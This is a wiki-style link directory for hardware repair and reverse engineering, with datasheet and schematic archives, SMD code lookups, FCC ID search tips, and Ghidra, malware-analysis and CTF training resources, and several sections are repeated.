::[https://soggi.org/ Soggi] - Retro hardware BIOS, firmware, drivers, manual, patches, tools, utilities, tech demos, other downloads and specifications available.

====Vintage Audio Equipment Schematics / Manuals====
::[https://hifigoteborg.se/pdf/ HiFiGoteborg] - LoudAndProud HiFi Goteborg. Schematic archive of old forgotten Hi-Fi from the golden days.

----

===SMD Marking Codes Database===

'''Due to the small size of most SMD components, manufacturers are not able to write the full part number on the case. They use instead a marking code typically composed of a combination of 2 or 3 letters or digits.''' 
'''When repairing an unknown electronic board, it becomes so difficult to know what is the exact type of a given component. This database allows to quickly find the part number of a SMD component when you have only the marking code.''' 

::[https://www.pcbcart.com/article/content/How-to-Identify-SMD-Components.html PCBCart] - How to Identify SMD Components Explained.

::[https://smd.yooneed.one/ smd.yooneed.one] - A searchable database of electronics SMD components marking codes.

::[https://embedeo.org/smd_codes/ embedeo.org/smd_codes] - SMD marking codes of electronic components such as bipolar transistors (BJT), field effect transistors (FET, MOSFET, JFET), diodes, Zener diodes, Schottky ..

::[https://repaircompanion.com/ RepairCompanion] - Your companion for electronics tools, component identification, calculators, diagnostics and education.

::[https://www.sos.sk/pdf/SMD_Catalog.pdf SOS electronic, The SMD CODEBOOK] - It lists well over 3,400 device codes in alphabetical order, together with type numbers, device characteristics or equivalents and pinout information.

::[http://www.marsport.org.uk/smd/mainframe.htm The SMD Codebook (marsport)] - Online version to look up a SMD codes.

::[https://www.s-manuals.com/smd S-manuals.com] - SMD Markings, SMD codes, ..

===IC Equivlent Database===

'''This might be useful if you run into a problem were you don't have a exact matching replacement part. Now you can use the cross reference search for an equivalent IC.'''

::[https://alltransistors.com/ All Transistors] - Datasheet. Cross Reference Search. Transistor Database.

::[https://octopart.com/ Octopart] - Lets you search for transistor datasheets but also allows you to filter by key specifications much like AllTransistors cross reference.

===Hardware pinouts (web-based)===

::[https://allpinouts.org/ allpinouts.org] - is a Web-based free content project to list cable and connectors pin-outs.

::[https://pinouts.ru/ pinouts.ru] - Handbook of hardware schemes, cables and connectors layouts pinouts.

----

===Find a image of the PCB without opening the device===
:# Modify the link below replace "example" without quotes with the product name and model you want to find
:# Visit the url and the results will show, if it does not show any results it has not been listed in the fccid database.
::<pre>https://www.google.com/search?tbm=isch&q=example+internal+site:fccid.io</pre>

::Note that there will be no results if the device does not have a wireless receiver or transmitter inside. Some have used a off-the-shelf (OTS) wireless radio to avoid having to do a new FCC certification. In that case it is useless material and time saving to first quickly image search the ID to check for this.
::[https://fccid.io/search.php FCCID.io search direct link]

====Electronic certification databases====
'''If the device is sold in the U.S. and complies with U.S. regulations, see below.''' 
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission. 
For legal sale of wireless devices in the US.
These databases can be of great use if you want to quickly know what kind of wireless communication hardware is used. 
Here you can most often find certifications, type approvals, specifications, instructions, internal/external pictures and sometimes even datasheets.

::* FCC.Report. Provides this easily searchable FCC ID database.
:::: [https://fcc.report/FCC-ID/ -> FCC.Report]
::* Device.report. Electronics device database of over 500,000 products with certifications, type approvals, specifications, instructions, and datasheets.
:::: [https://device.report/ -> Device.Report]

----

===Digital Education===
:Resources for reverse engineering closed-source software to identify bugs, debug, and conduct penetration testing.

====Reverse Engineering Guides====
:Tools are great, and sometimes free! Without knowing how to use them, they can be a big waste of time. Better to spend your time learning the basics, then apply your knowledge.

::[http://security.cs.rpi.edu/courses/hwre-spring2014/ CSCI 4974 / 6974 Hardware Reverse Engineering] - Good slide decks on reverse engineering hardware at all levels, IC to PCB.

::[https://github.com/mytechnotalent/Reverse-Engineering-Tutorial Reverse Engineering Tutorial] - A comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM & 64-bit ARM architectures.

=====Ghidra Documents=====
'''Class material linked from ghidra.re. Use arrow keys on keyboard to move through slides.'''
======Beginner======
::[https://ghidra.re/ghidra_docs/GhidraClass/Beginner/Introduction_to_Ghidra_Student_Guide.html Introduction to Ghidra Student Guide.]
======Intermediate======
::[https://ghidra.re/ghidra_docs/GhidraClass/Intermediate/Intermediate_Ghidra_Student_Guide.html Intermediate to Ghidra Student Guide.]
======Advanced (PDF)======
::[https://ghidra.re/ghidra_docs/GhidraClass/Advanced/improvingDisassemblyAndDecompilation.pdf Advanced (PDF).]
======Advanced Development======
::[https://ghidra.re/ghidra_docs/GhidraClass/AdvancedDevelopment/GhidraAdvancedDevelopment.html Advanced Development.]
======Debugger======
::[https://ghidra.re/ghidra_docs/GhidraClass/Debugger/README.html Debugger.]
======BSim======
::[https://ghidra.re/ghidra_docs/GhidraClass/BSim/README.html BSim.]

=====IDA Material=====

::[[File:Reverse Engineering Malware IDA & Olly Basics 5 parts by otw v1.pdf|thumb]] - A Reverse Engineering Malware introduction and bare basics IDA & Olly x86 (5 parts) by otw.

::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/ Using IDAPython to Make Your Life Easier: Part 1] - As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2 and Hopper are gaining traction). One of the more powerful features of IDA that I implore all reverse engineers to make use of is the Python addition, aptly named ‘IDAPython’, which exposes a large number of IDA API calls.

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/ Using IDAPython to Make Your Life Easier: Part 2]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/ Using IDAPython to Make Your Life Easier: Part 3]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/ Using IDAPython to Make Your Life Easier: Part 4]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/ Using IDAPython to Make Your Life Easier: Part 5]

::[https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering Some publicly available Malware analysis and Reverse engineering] - is a curated list of awesome materials from the user Dump-GUY a former Forensic, Malware Analyst, Reverse Engineer. [https://www.youtube.com/c/DuMpGuYTrIcKsTeR Youtube channel].

=====x64dbg=====

::[https://help.x64dbg.com/en/latest/introduction/index.html x64dbg] - Introduction & documentation page.

=====Immunity Debugger=====

::[https://class.malware.re/stuff/nardella/basic-reverse-engineering-immunity-debugger-36982.pdf Basic Reverse Engineering with Immunity Debugger] - SANS Institute Information Security Reading Room. Basic Reverse Engineering x86 with Immunity Debugger.

=====Malware Reverse Engineering=====

::[https://tryhackme.com/room/basicmalwarere BasicMalwareRE] - this room aims towards helping everyone learn about the basics of "Malware Reverse Engineering".

::[https://gist.github.com/IdanBanani/5be0442ad390f89259b494098f450bfd Reversing / Malware Analysis / Assembly -resources] - is a large list of reversing materials and courses.

::[https://github.com/CyberSecurityUP/Awesome-Malware-and-Reverse-Engineering Malware and Reverse Engineering Complete Collection] - Awesome Malware and Reverse Engineering collection by Joas.

=====Anti Debugging Protection Techniques with Examples=====
======x86 (Win32)======

::[https://anti-debug.checkpoint.com/ cp<r> Anti-Debug Tricks] - By Check Point Research: CPR, x86 & x64.

::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 & x64.

::[https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide An-Anti-Reverse-Engineering-Guide] - By Joshua Tully hosted on CodeProject, Win32/x86 with examples.

::[https://www.openrce.org/reference_library/anti_reversing OpenRCE Anti Reversing Database] - Mostly if not all Win32/x86. The Anti Reverse Engineering Database provides the analysis and desription for a number of various anti debugging, disassembly and dumping tricks. This resource aims to help reverse engineers locate, identify and bypass such techniques.

::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.

::[[Media:Anti-reverse engineering techniques by Jozef Miljak.pdf]] - An experimental study on which anti-reverse engineering technique are the most effective to protect your software from reversers, Win32/x86.

::[https://forum.tuts4you.com/files/file/1218-anti-reverse-engineering-guide/ Anti-Reverse Engineering Guide By Teddy Rogers] - An individual reading this should have a solid understanding of ASM, how computers handle memory, the Win32 Debugging API, and at least some knowledge of Windows internals.

======x64 (Win64)======

::[https://anti-debug.checkpoint.com/ cp<r> Anti-Debug Tricks] - By Check Point Research: CPR, x86 & x64.

::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 & x64.

::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.

====Machine code or virtual machine bytecode reference====

=====Assembly reference / manuals=====

======x86======

::[http://ref.x86asm.net/ Reference x86] - Reference X86 Opcode and Instructions (the holy x86 assembly bible).

======x86 Training======
::[https://x86re.com/1.html Reverse Engineering for Noobs Part 1] - Brief introduction to RE, executables, compiling, 32-bit x86 syntax, and stack frames.

::[https://x86re.com/2.html Reverse Engineering for Noobs Part 2: Portable Executable Files] - Breakdown of Portable Executable image file headers and sections.

======x86 and amd64======

::[https://www.felixcloutier.com/x86/ x86 and amd64 instruction reference] - Derived from the December 2023 version of the Intel® 64 and IA-32 Architectures Software Developer's Manual.

=====Bytecode reference=====
======Java Virtual Machine (JVM)======

::[https://en.wikipedia.org/wiki/List_of_Java_bytecode_instructions Wikipedia] - List of Java bytecode instructions.

::[https://javaalmanac.io/bytecode/ The Java Version Almanac] - Java Bytecode, by Mnemonic.

======Dalvik opcodes (Android)======

::[http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html Pallergabor] - Dalvik opcodes documentation with examples.

::[https://github.com/user1342/Awesome-Android-Reverse-Engineering Awesome-Android-Reverse-Engineering] - A curated list of awesome Android Reverse Engineering training, resources, and tools.

======Common Language Runtime (CLR) .NET======

::[https://en.wikipedia.org/wiki/List_of_CIL_instructions Wikipedia] - List of CIL instructions.

::[https://github.com/stakx/ecma-335/blob/master/docs/TABLE_OF_CONTENTS.md ECMA-335 Documentation] - This Standard defines the Common Language Infrastructure (CLI).

====Reverse Engineering Challenges====

::[https://crackmes.one/ Crackmes.one] - is a simple place where you can download crackmes to improve your reverse engineering skills.

::[https://crackmy.app/ CrackMy.App] - is as place to share your crackmes, solve challenges, and climb the leaderboard in the ultimate reverse engineering community.

====Security Training Classes====

::[https://ost2.fyi/ OpenSecurityTraining2] - is a free, beta-stage online platform built on Open edX that offers in-depth cybersecurity and reverse-engineering courses like x86 assembly, kernel exploitation, and firmware analysis.

====Security CTF====
Capture the Flag (CTF) in computer security is an exercise in which participants attempt to find text strings, called "flags", which are secretly hidden in purposefully vulnerable programs or websites. 
Learn more about reverse engineering and cybersecurity start playing CTF's.

::[https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ CTF Beginners Guide] - is intended to be a guide for beginners who have just started playing CTFs (or for people who have never played, but would like to).

::[https://ctflearn.com/ CTFlearn] - The most beginner-friendly way to get into hacking. Challenges Test your skills by hacking your way through hundreds of challenges.

::[https://ctf101.org/ CTF101] - a site documenting the basics of playing Capture the Flags. This guide was written and maintained by the OSIRIS Lab at New York University.

::[https://picoctf.org/ picoCTF] - is a free computer security education program with original content built on a capture-the-flag framework created by security and privacy experts.

::[https://microcorruption.com/ MicroCorruption] - is a online, embedded debugger that starts from scratch and introduces the very foundations of memory corruption. Great practice for learning the basics of binary exploitation.

::[https://echoctf.red/ echoctf.red] - A platform to develop, run and administer CTF competitions. The online echoCTF.RED platform user interfaces and codebase.

::[https://pwnable.kr/ Wargames Pwnable.kr] - is a non-commercial wargame site which provides various pwn challenges regarding system exploitation, including reverse engineering, web exploitation, and cryptography.

::[https://pwnable.tw/challenge/ Wargames Pwnable.tw] - is a wargame site for hackers to test and expand their binary exploiting skills. HOW-TO. Try to find out the vulnerabilities exists.

::[https://ctfsites.github.io/ More CTF sites] - A curated list of more CTF sites on Github.

====Embedded security Challenge (ESC)====

::[https://github.com/TrustworthyComputing/csaw_esc_2024 csaw_esc_2024] - CSAW 2024 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2023 csaw_esc_2023] - CSAW 2023 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2022 csaw_esc_2022] - CSAW 2022 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2021 csaw_esc_2021] - CSAW 2021 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2019 csaw_esc_2019] - CSAW 2019 Embedded Security Challenge (Github repo).

====800 MHz AMPS Documentation====
::[https://wiki.recessim.com/w/images/8/86/Cellular_Telephone_Bible_With_SIDs.txt The Cellular Telephone Bible by Mike Larsen (1997)] Unlock codes and programming procedures of early 800 MHz analog AMPS cellular phones. This document also contains the system IDs (SID) of the 800 MHz analog service providers.

Literature

2026-01-24T10:35:20Z

Polymorphic7: add dork pdf search term ru espec forum

Books, Journals, Magazines, Datasheets and all other literature related to reverse engineering is welcome here. The book pictured is the bound edition of a portion of the PDF's available in the PoC||GTFO section.[[File:POCorGTFO.jpg|thumb|<nowiki>Bound edition of PoC||GTFO, Proof of Concept OR Get The Fuck Out.</nowiki>]]

===Books and Magazines===
::[[PoCorGTFO|PoC||GTFO]] - International Journal of Proof-of-Concept or Get The Fuck Out (Mirror)

::[https://wiki.recessim.com/w/images/0/01/HackingTheXbox_Free.pdf Hacking the Xbox] - An Introduction to Reverse Engineering by Andrew "bunnie" Huang

::[https://nostarch.com/hardwarehackerpaperback The Hardware Hacker] - Manufacturing and Open Hardware by Andrew "bunnie" Huang

::[https://www.lehmanns.de/shop/mathematik-informatik/56052761-9781789619133-practical-hardware-pentesting Practical Hardware Pentesting] - A guide to attacking embedded systems and protecting them against the most common hardware attacks (ISBN 978-1-78961-913-3).

::[https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks Awesome-Cybersecurity-Handbooks] - Big collection of documents for cybersecurity & reverse engineering.

===Datasheets, boardviews, schematics, manuals===

====Generic (various fields)====

'''The curralated list below provides a wide range of useful websites offering resources regarding repair of wide range of electronic devices.'''

::[https://www.eserviceinfo.com/ e-service info] - Here you can find free datasheets, service manuals, schema, schematic diagrams and software downloads, service menu and mode information, code calculators for many brands of equipment. Search in all service docs that are OCR'd.

::[https://www.docin.com/ DOCin] - Chinese datasheet and other documents website

::[https://www.espec.ws/ espec.ws] [https://www.google.com/search?q=file%3Apdf%20site%3Ahttps%3A%2F%2Fmonitor.espec.ws%2Ffiles 1e100 Dork]- Russian site for people specializing in the repair and development of electronic equipment or who want to learn how to do it. Has a archive with datasheets and schematics.

::[https://www.badcaps.net/ Badcaps] - Badcaps Electronics Repair Forum & Schematic Search.

::[https://www.eserviceinfo.com/browse.php eServiceInfo] - Service manuals, schematics, documentation, programs, electronics, hobby ....

::[https://elektrotanya.com/keres Elektrotanya] - This site helps you to save the Earth from electronic waste! Schemetics, Service manuals, etc.

::[https://servlib.com/ ServLib] - The largest library of service manuals and schematics for Sony, Panasonic, Sharp, JBL. Repair information for electronics technicians. [https://github.com/AriZoneVibes/ServLibScrapper/ Scraper for ServLib].

::[https://www.freeservicemanuals.info FreeServiceManuals] - Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.

::[http://www.nostatech.nl/ Nostatech] - Nostatech's Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.

::[https://www.alldatasheet.com/ Alldatasheets] - Chinese datasheet database.

::[https://alltransistors.com/ All Transistors] - All Transistors Datasheet. Cross Reference Search. Transistor Database.

::[https://remont-aud.net/ Remont-aud] - Russian website offering a collection of schematics, datasheets and firmware dumps.

::[http://rom.by/ rom.by] - Russian website has verious rom dumps, datasheet and schematics

::[https://whycan.com whycan.com] - A Chinese embedded ARM development community offering a collection of schematics, SDKs for different platforms, datasheets, and firmware dumps.

::[https://www.s-manuals.com/ S-manuals.com] - Schematics, Service Manuals, ..

::[https://www.schematicsunlimited.com/ schematicsunlimited.com] - Download FREE diagrams, schematics, service manuals, operating manuals and other useful information for a variety of products.

====Portable computers, smartphones, videocards, printers, TVs====

'''The curralated list below provides a wide range of useful websites offering resources regarding repair of mostly smartphones, printers and laptops / notebooks.'''

::[https://vlab.su/ Vlab.su] - Russian virtual repair community. Virtual repair laboratory. Any problem can be solved together.

::[https://www.macdat.net/ macdat.net] - is a hobbyist-run website offering a detailed database of vintage laptop specs and Macintosh repair resources, including capacitor guides and service schematics.

::[https://www.electronica-pt.com/ Electrónica PT] - Portuguese community for basic and advanced electronics, electronic repair support center.

::[https://thetechstall.com/ The Tech Stall] - Download all the necessary tools for laptop and desktop motherboard diagnostics and fixes at no cost for free to reduce e-waste and spare the environment.

::[https://www.cyberforum.ru/notebook-circuit/ Cyberforum] - A Russian forum for programmers and system administrators also offering some schematics and boardview for repair.

::[https://zremcom.ru/scheme/scheme-laptops Zremcom] - A Russian website for repair, setup of servers, computers. Service manuals and diagrams for computers, laptops and power supplies.

::[https://www.alisaler.com/ AliSaler] - Website offering EC & Bios firmwares / bins, datasheets, boardviews, schematics, ic equivalent information, and programmer software for laptops.

::[https://www.alifixit.com/ AliFixit] - We believe in reviving technology and minimizing electronic waste. As our field is computers and laptops, we are here trying to provide as much stuff as possible for free to make our contribution.

::[https://www.indiafix.in/p/schematic-and-boardview-collection.html IndiaFix] - Free laptop schematic & boardviews downloads. Desktop bios dumps, and free repair tips.

::[https://www.apple-schematic.se/ Apple Schematic] - Free schematic and boardview (BRD) for Apple Macbooks and other Apple devices.

::[https://novoselovvlad.ru/ Novoselovvlad.ru] - Blog of the workshop of Vladislav Novoselov (offers schematics, bios dumps, and various other helpful tools).

::[http://printer1.blogspot.com/ printer1] - Collection of service manuals for printers and laptops.

::[https://www.tvservice.org/ TV Service] - is a Russian website offering datasheets and schematics for TV repair.

::[https://www.smarttvmanuals.net/ Smart Tv Manuals & Circuit Board Diagrams] - is a website offering datasheets and schematics for Smart TV repair.

::[https://www.informaticanapoli.it/manuali-di-servizio/ informaticanapoli] - Italian website that offers service manuals and schematics for various laptop brands.

::[https://www.gadget-manual.com/nvidia-geforce/ Gadget-Manual] - Graphic card manuals boardviews and datasheets.

::[https://sector.biz.ua/docs/schematic_diagrams_msi_motherboards/schematic_diagrams_msi_motherboards.phtml Sector] - Russian website offering schemetic diagrams, datasheets and boardviews (Asrock, Asus, ECS, Gigabyte, Acer, IBM/Lenovo).

::[https://schematic-x.blogspot.com/ Schematic-x] - Free laptops & desktop schematic diagrams and BIOS downloads.

::[https://www.s-manuals.com/notebook S-manuals.com] - Notebooks, Schematics, Service Manuals, ..

=====Laptop or smartphone Boardview / Schematic / Firmware [Groups]=====
::[https://t.me/schematicslaptop schematicslaptop] - Laptop schematics.

::[https://t.me/biosarchive biosarchive] - The largest channel of archived bios (firmwares) of laptops.

::[https://t.me/SMART_PHONE_SCHEMATICS SMART_PHONE_SCHEMATICS] - Colection of smartphone schematics.

=====Software for opening Boardview files=====

::[[Software_Tools#Tools_for_opening_CAD_or_Boardview_files|Tools for opening CAD or Boardview files.]]

====Retro PC Hardware====
::[https://theretroweb.com/ The Retro Web] - The Retro Web motherboard database, here you can find board photos, BIOS images, manuals and more!

::[https://soggi.org/ Soggi] - Retro hardware BIOS, firmware, drivers, manual, patches, tools, utilities, tech demos, other downloads and specifications available.

====Vintage Audio Equipment Schematics / Manuals====
::[https://hifigoteborg.se/pdf/ HiFiGoteborg] - LoudAndProud HiFi Goteborg. Schematic archive of old forgotten Hi-Fi from the golden days.

----

===SMD Marking Codes Database===

'''Due to the small size of most SMD components, manufacturers are not able to write the full part number on the case. They use instead a marking code typically composed of a combination of 2 or 3 letters or digits.''' 
'''When repairing an unknown electronic board, it becomes so difficult to know what is the exact type of a given component. This database allows to quickly find the part number of a SMD component when you have only the marking code.''' 

::[https://www.pcbcart.com/article/content/How-to-Identify-SMD-Components.html PCBCart] - How to Identify SMD Components Explained.

::[https://smd.yooneed.one/ smd.yooneed.one] - A searchable database of electronics SMD components marking codes.

::[https://embedeo.org/smd_codes/ embedeo.org/smd_codes] - SMD marking codes of electronic components such as bipolar transistors (BJT), field effect transistors (FET, MOSFET, JFET), diodes, Zener diodes, Schottky ..

::[https://repaircompanion.com/ RepairCompanion] - Your companion for electronics tools, component identification, calculators, diagnostics and education.

::[https://www.sos.sk/pdf/SMD_Catalog.pdf SOS electronic, The SMD CODEBOOK] - It lists well over 3,400 device codes in alphabetical order, together with type numbers, device characteristics or equivalents and pinout information.

::[http://www.marsport.org.uk/smd/mainframe.htm The SMD Codebook (marsport)] - Online version to look up a SMD codes.

::[https://www.s-manuals.com/smd S-manuals.com] - SMD Markings, SMD codes, ..

===IC Equivlent Database===

'''This might be useful if you run into a problem were you don't have a exact matching replacement part. Now you can use the cross reference search for an equivalent IC.'''

::[https://alltransistors.com/ All Transistors] - Datasheet. Cross Reference Search. Transistor Database.

::[https://octopart.com/ Octopart] - Lets you search for transistor datasheets but also allows you to filter by key specifications much like AllTransistors cross reference.

===Hardware pinouts (web-based)===

::[https://allpinouts.org/ allpinouts.org] - is a Web-based free content project to list cable and connectors pin-outs.

::[https://pinouts.ru/ pinouts.ru] - Handbook of hardware schemes, cables and connectors layouts pinouts.

----

===Find a image of the PCB without opening the device===
:# Modify the link below replace "example" without quotes with the product name and model you want to find
:# Visit the url and the results will show, if it does not show any results it has not been listed in the fccid database.
::<pre>https://www.google.com/search?tbm=isch&q=example+internal+site:fccid.io</pre>

::Note that there will be no results if the device does not have a wireless receiver or transmitter inside. Some have used a off-the-shelf (OTS) wireless radio to avoid having to do a new FCC certification. In that case it is useless material and time saving to first quickly image search the ID to check for this.
::[https://fccid.io/search.php FCCID.io search direct link]

====Electronic certification databases====
'''If the device is sold in the U.S. and complies with U.S. regulations, see below.''' 
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission. 
For legal sale of wireless devices in the US.
These databases can be of great use if you want to quickly know what kind of wireless communication hardware is used. 
Here you can most often find certifications, type approvals, specifications, instructions, internal/external pictures and sometimes even datasheets.

::* FCC.Report. Provides this easily searchable FCC ID database.
:::: [https://fcc.report/FCC-ID/ -> FCC.Report]
::* Device.report. Electronics device database of over 500,000 products with certifications, type approvals, specifications, instructions, and datasheets.
:::: [https://device.report/ -> Device.Report]

----

===Digital Education===
:Resources for reverse engineering closed-source software to identify bugs, debug, and conduct penetration testing.

====Reverse Engineering Guides====
:Tools are great, and sometimes free! Without knowing how to use them, they can be a big waste of time. Better to spend your time learning the basics, then apply your knowledge.

::[http://security.cs.rpi.edu/courses/hwre-spring2014/ CSCI 4974 / 6974 Hardware Reverse Engineering] - Good slide decks on reverse engineering hardware at all levels, IC to PCB.

::[https://github.com/mytechnotalent/Reverse-Engineering-Tutorial Reverse Engineering Tutorial] - A comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM & 64-bit ARM architectures.

=====Ghidra Documents=====
'''Class material linked from ghidra.re. Use arrow keys on keyboard to move through slides.'''
======Beginner======
::[https://ghidra.re/ghidra_docs/GhidraClass/Beginner/Introduction_to_Ghidra_Student_Guide.html Introduction to Ghidra Student Guide.]
======Intermediate======
::[https://ghidra.re/ghidra_docs/GhidraClass/Intermediate/Intermediate_Ghidra_Student_Guide.html Intermediate to Ghidra Student Guide.]
======Advanced (PDF)======
::[https://ghidra.re/ghidra_docs/GhidraClass/Advanced/improvingDisassemblyAndDecompilation.pdf Advanced (PDF).]
======Advanced Development======
::[https://ghidra.re/ghidra_docs/GhidraClass/AdvancedDevelopment/GhidraAdvancedDevelopment.html Advanced Development.]
======Debugger======
::[https://ghidra.re/ghidra_docs/GhidraClass/Debugger/README.html Debugger.]
======BSim======
::[https://ghidra.re/ghidra_docs/GhidraClass/BSim/README.html BSim.]

=====IDA Material=====

::[[File:Reverse Engineering Malware IDA & Olly Basics 5 parts by otw v1.pdf|thumb]] - A Reverse Engineering Malware introduction and bare basics IDA & Olly x86 (5 parts) by otw.

::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/ Using IDAPython to Make Your Life Easier: Part 1] - As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2 and Hopper are gaining traction). One of the more powerful features of IDA that I implore all reverse engineers to make use of is the Python addition, aptly named ‘IDAPython’, which exposes a large number of IDA API calls.

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/ Using IDAPython to Make Your Life Easier: Part 2]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/ Using IDAPython to Make Your Life Easier: Part 3]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/ Using IDAPython to Make Your Life Easier: Part 4]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/ Using IDAPython to Make Your Life Easier: Part 5]

::[https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering Some publicly available Malware analysis and Reverse engineering] - is a curated list of awesome materials from the user Dump-GUY a former Forensic, Malware Analyst, Reverse Engineer. [https://www.youtube.com/c/DuMpGuYTrIcKsTeR Youtube channel].

=====x64dbg=====

::[https://help.x64dbg.com/en/latest/introduction/index.html x64dbg] - Introduction & documentation page.

=====Immunity Debugger=====

::[https://class.malware.re/stuff/nardella/basic-reverse-engineering-immunity-debugger-36982.pdf Basic Reverse Engineering with Immunity Debugger] - SANS Institute Information Security Reading Room. Basic Reverse Engineering x86 with Immunity Debugger.

=====Malware Reverse Engineering=====

::[https://tryhackme.com/room/basicmalwarere BasicMalwareRE] - this room aims towards helping everyone learn about the basics of "Malware Reverse Engineering".

::[https://gist.github.com/IdanBanani/5be0442ad390f89259b494098f450bfd Reversing / Malware Analysis / Assembly -resources] - is a large list of reversing materials and courses.

::[https://github.com/CyberSecurityUP/Awesome-Malware-and-Reverse-Engineering Malware and Reverse Engineering Complete Collection] - Awesome Malware and Reverse Engineering collection by Joas.

=====Anti Debugging Protection Techniques with Examples=====
======x86 (Win32)======

::[https://anti-debug.checkpoint.com/ cp<r> Anti-Debug Tricks] - By Check Point Research: CPR, x86 & x64.

::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 & x64.

::[https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide An-Anti-Reverse-Engineering-Guide] - By Joshua Tully hosted on CodeProject, Win32/x86 with examples.

::[https://www.openrce.org/reference_library/anti_reversing OpenRCE Anti Reversing Database] - Mostly if not all Win32/x86. The Anti Reverse Engineering Database provides the analysis and desription for a number of various anti debugging, disassembly and dumping tricks. This resource aims to help reverse engineers locate, identify and bypass such techniques.

::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.

::[[Media:Anti-reverse engineering techniques by Jozef Miljak.pdf]] - An experimental study on which anti-reverse engineering technique are the most effective to protect your software from reversers, Win32/x86.

::[https://forum.tuts4you.com/files/file/1218-anti-reverse-engineering-guide/ Anti-Reverse Engineering Guide By Teddy Rogers] - An individual reading this should have a solid understanding of ASM, how computers handle memory, the Win32 Debugging API, and at least some knowledge of Windows internals.

======x64 (Win64)======

::[https://anti-debug.checkpoint.com/ cp<r> Anti-Debug Tricks] - By Check Point Research: CPR, x86 & x64.

::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 & x64.

::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.

====Machine code or virtual machine bytecode reference====

=====Assembly reference / manuals=====

======x86======

::[http://ref.x86asm.net/ Reference x86] - Reference X86 Opcode and Instructions (the holy x86 assembly bible).

======x86 Training======
::[https://x86re.com/1.html Reverse Engineering for Noobs Part 1] - Brief introduction to RE, executables, compiling, 32-bit x86 syntax, and stack frames.

::[https://x86re.com/2.html Reverse Engineering for Noobs Part 2: Portable Executable Files] - Breakdown of Portable Executable image file headers and sections.

======x86 and amd64======

::[https://www.felixcloutier.com/x86/ x86 and amd64 instruction reference] - Derived from the December 2023 version of the Intel® 64 and IA-32 Architectures Software Developer's Manual.

=====Bytecode reference=====
======Java Virtual Machine (JVM)======

::[https://en.wikipedia.org/wiki/List_of_Java_bytecode_instructions Wikipedia] - List of Java bytecode instructions.

::[https://javaalmanac.io/bytecode/ The Java Version Almanac] - Java Bytecode, by Mnemonic.

======Dalvik opcodes (Android)======

::[http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html Pallergabor] - Dalvik opcodes documentation with examples.

::[https://github.com/user1342/Awesome-Android-Reverse-Engineering Awesome-Android-Reverse-Engineering] - A curated list of awesome Android Reverse Engineering training, resources, and tools.

======Common Language Runtime (CLR) .NET======

::[https://en.wikipedia.org/wiki/List_of_CIL_instructions Wikipedia] - List of CIL instructions.

::[https://github.com/stakx/ecma-335/blob/master/docs/TABLE_OF_CONTENTS.md ECMA-335 Documentation] - This Standard defines the Common Language Infrastructure (CLI).

====Reverse Engineering Challenges====

::[https://crackmes.one/ Crackmes.one] - is a simple place where you can download crackmes to improve your reverse engineering skills.

::[https://crackmy.app/ CrackMy.App] - is as place to share your crackmes, solve challenges, and climb the leaderboard in the ultimate reverse engineering community.

====Security Training Classes====

::[https://ost2.fyi/ OpenSecurityTraining2] - is a free, beta-stage online platform built on Open edX that offers in-depth cybersecurity and reverse-engineering courses like x86 assembly, kernel exploitation, and firmware analysis.

====Security CTF====
